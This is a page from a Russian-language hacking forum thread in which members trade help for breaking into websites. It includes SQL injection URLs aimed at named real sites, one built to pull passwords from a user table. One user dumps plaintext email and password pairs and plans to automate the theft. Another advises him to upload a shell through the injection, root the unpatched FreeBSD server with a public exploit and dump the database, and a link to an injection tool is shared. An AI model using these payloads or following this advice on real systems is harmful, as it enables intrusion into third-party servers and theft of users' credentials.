Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.vaemergency.com/train/calendar_course.cfm?id=156+or+1=@@version

    стандартная MS_SQL инъекция
     
    _________________________
    #14101 Konqi, 13 Jul 2010
    Last edited: 13 Jul 2010
  2. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.wischamberfoundation.org/wcs/display.cfm?id=314+and+1=2+union+select+top+1+1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21+from+user
    
    Какие идеи?
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    почитай статью sql инъекция в ms access

    таблица user зарезервирована ты не можешь сделать запрос к этой таблице
     
    _________________________
  4. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Есть вроде как уязвимость в Явовом сайте в пост параметре terms
    Работает как через http так и через https

    Но так как я с явой не имел дело, не имею понятия как с ним обращаться, может кто подскажет?
     
  5. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    Прочитал, и не понял где моя ошибка.

    Давай настроим файл hosts для локального сервера. По дефолту там прописано:

    127.0.0.1 localhost
    Заменим слово "localhost" на "local.net"
    127.0.0.1 local.net

    Набираем в браузере http://local.net

    Браузер выводит:

    Error!
    Could not locate remote server

    Что можете предложить, чтобы локальный сервер заработал по этому адресу?
     
  6. seofilms

    seofilms Banned

    Joined:
    27 May 2009
    Messages:
    66
    Likes Received:
    46
    Reputations:
    14
    Есть ли способы залить шелл в (vBulletin 3.8.4) через админку администратора (не глав. администратора) ?
    Если кто знает, дайте пожалуйста ссылку на видео или статью, спасибо.
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    www.google.ru 1111.2222.3333.4444

    где ты видел такие IP адреса?
     
    _________________________
  8. Anexroid

    Anexroid New Member

    Joined:
    22 Aug 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Помогите с SQL-Inj, пожалуйста.

    Подобрал кол-во столбцов, запросом
    1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

    Узнал данные о сервере
    PHP Version 5.2.10
    System FreeBSD fe61.hc.ru 6.2-RELEASE-p3 FreeBSD 6.2-RELEASE-p3 #2: Thu Apr 12 13:46:06 MSD 2007 [email protected]:/usr/obj/usr/src/sys/XEON i386
    Mysql Client API version 4.1.22
    Apache/1.3.34 (Unix)

    Нашел багу:
    site.ru/index.php?id=1'
    Выдаёт
    Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in ****

    Что еще можно вытянуть? и как? Подскажите, плз
     
  9. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    смотрю что то очень страшные вопросы пошли =\
    2Anexroid найти принтабельное поле и ..... прочитать это https://forum.antichat.ru/thread43966.html и что то сделать своим умом ...
    2f137ch линк в ПМ помогу с раскруткой а то тут телепаты в отпуске ...
     
    _________________________
  10. Anexroid

    Anexroid New Member

    Joined:
    22 Aug 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Спс, нашел поле `email` только. =( Но за линк спс.
     
  11. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    2shell_c0de

    с aspx тяжеловато будет...
     
    2 people like this.
  12. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Версия Mysql 4.1.22 намекает, что таблицы нужно брутить

    UPD:

    AC//DC

    Не понял, думал сообщение относится к проблеме Anexroid.
     
    #14112 h00lyshit!, 13 Jul 2010
    Last edited: 13 Jul 2010
    3 people like this.
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    Все правильно, но подставив даже любой существующий адрес, например:

    255.255.255.255 www.google.ru
    100.100.100.100 www.google.ru
    150.150.150.150 www.google.ru
    200.200.200.200 www.google.ru

    в файле hosts, мы попадаем на настоящую страничку гугла, это ничего не меняет.
     
  14. Anexroid

    Anexroid New Member

    Joined:
    22 Aug 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Всем спасибо, разобрался... Осталось только автоматизировать вытягивание email::pass.

    Причем пасс - в открытом виде)
     
  15. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    - у тебя есть скуля
    - не пропатченная фряха версии 6.2, под которую в паблике есть эксплойт

    Есть все необходимые условия.

    Заливай шелл через скуль, рутай серв, дампь базу.
     
    #14115 h00lyshit!, 13 Jul 2010
    Last edited: 18 Jul 2010
    2 people like this.
  16. Anexroid

    Anexroid New Member

    Joined:
    22 Aug 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Мешает то, что кавычки там экранируются((
     
  17. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Юзай SIPT4, брути таблицы, ищи админку. Xэксить названия таблиц она умеет (к теме об magic_quotes).
     
    #14117 h00lyshit!, 13 Jul 2010
    Last edited: 18 Jul 2010
  18. Anexroid

    Anexroid New Member

    Joined:
    22 Aug 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    А вот это для меня уже не по русски... Я так понимаю утилита? =) И судя по описанию - сложная))

    А она с POST-запросами работает? А то у меня не GET
     
  19. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Работает.

    http://www.sendspace.com/file/k8wqua

    Мануал:

    https://forum.antichat.ru/thread40545.html
     
  20. Anexroid

    Anexroid New Member

    Joined:
    22 Aug 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Установил, запустил, прочитал мануал. И нифига не понял как это работает.
     
Thread Status:
Not open for further replies.